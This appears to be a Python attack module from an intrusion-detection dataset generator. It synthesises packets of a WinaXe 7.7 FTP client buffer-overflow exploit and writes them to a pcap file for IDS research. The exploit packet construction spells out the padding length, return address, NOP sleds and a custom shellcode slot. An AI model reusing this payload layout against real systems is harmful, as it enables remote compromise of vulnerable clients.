import logging
import random as rnd

import scapy.layers.inet as inet

import Attack.AttackParameters as atkParam
import Attack.BaseAttack as BaseAttack
import ID2TLib.Utility
import ID2TLib.Utility as Util

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

# noinspection PyPep8

ftp_port = 21


class FTPWinaXeExploit(BaseAttack.BaseAttack):
    def __init__(self):
        """
        Creates a new instance of the FTPWinaXeExploit.
        """
        # Initialize attack
        super(FTPWinaXeExploit, self).__init__("FTPWinaXe Exploit", "Injects an WinaXe 7.7 FTP Exploit.",
                                               "Privilege elevation")

        # Define allowed parameters and their type
        self.supported_params.update({
            atkParam.Parameter.IP_SOURCE: atkParam.ParameterTypes.TYPE_IP_ADDRESS,
            atkParam.Parameter.IP_DESTINATION: atkParam.ParameterTypes.TYPE_IP_ADDRESS,
            atkParam.Parameter.MAC_SOURCE: atkParam.ParameterTypes.TYPE_MAC_ADDRESS,
            atkParam.Parameter.MAC_DESTINATION: atkParam.ParameterTypes.TYPE_MAC_ADDRESS,
            atkParam.Parameter.INJECT_AT_TIMESTAMP: atkParam.ParameterTypes.TYPE_FLOAT,
            atkParam.Parameter.INJECT_AFTER_PACKET: atkParam.ParameterTypes.TYPE_PACKET_POSITION,
            atkParam.Parameter.IP_SOURCE_RANDOMIZE: atkParam.ParameterTypes.TYPE_BOOLEAN,
            atkParam.Parameter.PACKETS_PER_SECOND: atkParam.ParameterTypes.TYPE_FLOAT,
            atkParam.Parameter.CUSTOM_PAYLOAD: atkParam.ParameterTypes.TYPE_STRING,
            atkParam.Parameter.CUSTOM_PAYLOAD_FILE: atkParam.ParameterTypes.TYPE_STRING
        })

    def init_params(self):
        """
        Initialize the parameters of this attack using the user supplied command line parameters.
        Use the provided statistics to calculate default parameters and to process user
        supplied queries.

        """
        # PARAMETERS: initialize with default values
        # (values are overwritten if user specifies them)
        most_used_ip_address = self.statistics.get_most_used_ip_address()

        # The most used IP class in background traffic
        most_used_ip_class = Util.handle_most_used_outputs(self.statistics.get_most_used_ip_class())
        attacker_ip = self.generate_random_ipv4_address(most_used_ip_class)
        self.add_param_value(atkParam.Parameter.IP_DESTINATION, attacker_ip)
        self.add_param_value(atkParam.Parameter.MAC_DESTINATION, self.generate_random_mac_address())

        random_ip_address = self.statistics.get_random_ip_address()
        # victim should be valid and not equal to attacker
        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == attacker_ip:
            random_ip_address = self.statistics.get_random_ip_address()

        self.add_param_value(atkParam.Parameter.IP_SOURCE, random_ip_address)
        victim_mac = self.statistics.get_mac_address(random_ip_address)
        if isinstance(victim_mac, list) and len(victim_mac) == 0:
            victim_mac = self.generate_random_mac_address()
        self.add_param_value(atkParam.Parameter.MAC_SOURCE, victim_mac)
        self.add_param_value(atkParam.Parameter.PACKETS_PER_SECOND,
                             (self.statistics.get_pps_sent(most_used_ip_address) +
                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
        self.add_param_value(atkParam.Parameter.INJECT_AFTER_PACKET, rnd.randint(0, self.statistics.get_packet_count()))
        self.add_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE, 'False')
        self.add_param_value(atkParam.Parameter.CUSTOM_PAYLOAD, '')
        self.add_param_value(atkParam.Parameter.CUSTOM_PAYLOAD_FILE, '')

    def generate_attack_packets(self):

        pps = self.get_param_value(atkParam.Parameter.PACKETS_PER_SECOND)

        # Timestamp
        timestamp_next_pkt = self.get_param_value(atkParam.Parameter.INJECT_AT_TIMESTAMP)
        # store start time of attack
        self.attack_start_utime = timestamp_next_pkt

        # Initialize parameters
        ip_victim = self.get_param_value(atkParam.Parameter.IP_SOURCE)
        ip_attacker = self.get_param_value(atkParam.Parameter.IP_DESTINATION)
        mac_victim = self.get_param_value(atkParam.Parameter.MAC_SOURCE)
        mac_attacker = self.get_param_value(atkParam.Parameter.MAC_DESTINATION)

        custom_payload = self.get_param_value(atkParam.Parameter.CUSTOM_PAYLOAD)
        custom_payload_len = len(custom_payload)
        custom_payload_limit = 1000
        Util.check_payload_len(custom_payload_len, custom_payload_limit)

        self.packets = []

        # Create random victim if specified
        if self.get_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE):
            # The most used IP class in background traffic
            most_used_ip_class = Util.handle_most_used_outputs(self.statistics.get_most_used_ip_class())
            ip_victim = self.generate_random_ipv4_address(most_used_ip_class, 1)
            mac_victim = self.generate_random_mac_address()

        # Get MSS, TTL and Window size value for victim/attacker IP
        victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(ip_victim)
        attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(ip_attacker)

        min_delay, max_delay = self.get_reply_delay(ip_attacker)

        attacker_seq = rnd.randint(1000, 50000)
        victim_seq = rnd.randint(1000, 50000)

        sport = Util.generate_source_port_from_platform("win7")

        # connection request from victim (client)
        victim_ether = inet.Ether(src=mac_victim, dst=mac_attacker)
        victim_ip = inet.IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF')
        request_tcp = inet.TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S',
                               seq=victim_seq, options=[('MSS', victim_mss_value)])
        victim_seq += 1
        syn = (victim_ether / victim_ip / request_tcp)
        syn.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps, min_delay)
        self.packets.append(syn)

        # response from attacker (server)
        attacker_ether = inet.Ether(src=mac_attacker, dst=mac_victim)
        attacker_ip = inet.IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF')
        reply_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA',
                             window=attacker_win_value, options=[('MSS', attacker_mss_value)])
        attacker_seq += 1
        synack = (attacker_ether / attacker_ip / reply_tcp)
        synack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps, min_delay)
        self.packets.append(synack)

        # acknowledgement from victim (client)
        ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                           window=victim_win_value, options=[('MSS', victim_mss_value)])
        ack = (victim_ether / victim_ip / ack_tcp)
        ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ack)

        # FTP exploit packet
        ftp_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA',
                           window=attacker_win_value, options=[('MSS', attacker_mss_value)])

        characters = b'220'
        characters += Util.get_rnd_bytes(2065, Util.forbidden_chars)
        characters += b'\x96\x72\x01\x68'
        characters += Util.get_rnd_x86_nop(10, False, Util.forbidden_chars)

        custom_payload_file = self.get_param_value(atkParam.Parameter.CUSTOM_PAYLOAD_FILE)

        if custom_payload == '':
            if custom_payload_file == '':
                payload = Util.get_rnd_bytes(custom_payload_limit, Util.forbidden_chars)
            else:
                payload = ID2TLib.Utility.get_bytes_from_file(custom_payload_file)
                Util.check_payload_len(len(payload), custom_payload_limit)
                payload += Util.get_rnd_x86_nop(custom_payload_limit - len(payload), False, Util.forbidden_chars)
        else:
            encoded_payload = custom_payload.encode()
            payload = Util.get_rnd_x86_nop(custom_payload_limit - custom_payload_len, False, Util.forbidden_chars)
            payload += encoded_payload

        characters += payload
        characters += Util.get_rnd_x86_nop(20, False, Util.forbidden_chars)
        characters += b'\r\n'

        ftp_tcp.add_payload(characters)

        ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
        ftp_buff.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ftp_buff)
        attacker_seq += len(ftp_tcp.payload)

        # Fin Ack from attacker
        fin_ack_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA',
                               window=attacker_win_value, options=[('MSS', attacker_mss_value)])

        fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
        fin_ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps, min_delay)
        self.packets.append(fin_ack)

        # Ack from victim on FTP packet
        ftp_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                               window=victim_win_value, options=[('MSS', victim_mss_value)])
        ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
        ftp_ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ftp_ack)

        # Ack from victim on Fin/Ack of attacker
        fin_ack_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq + 1, flags='A',
                                   window=victim_win_value, options=[('MSS', victim_mss_value)])
        fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
        fin_ack_ack.time = timestamp_next_pkt
        self.packets.append(fin_ack_ack)

    def generate_attack_pcap(self):
        # store end time of attack
        self.attack_end_utime = self.packets[-1].time

        # write attack packets to pcap
        pcap_path = self.write_attack_pcap(sorted(self.packets, key=lambda pkt: pkt.time))

        # return packets sorted by packet time_sec_start
        return len(self.packets), pcap_path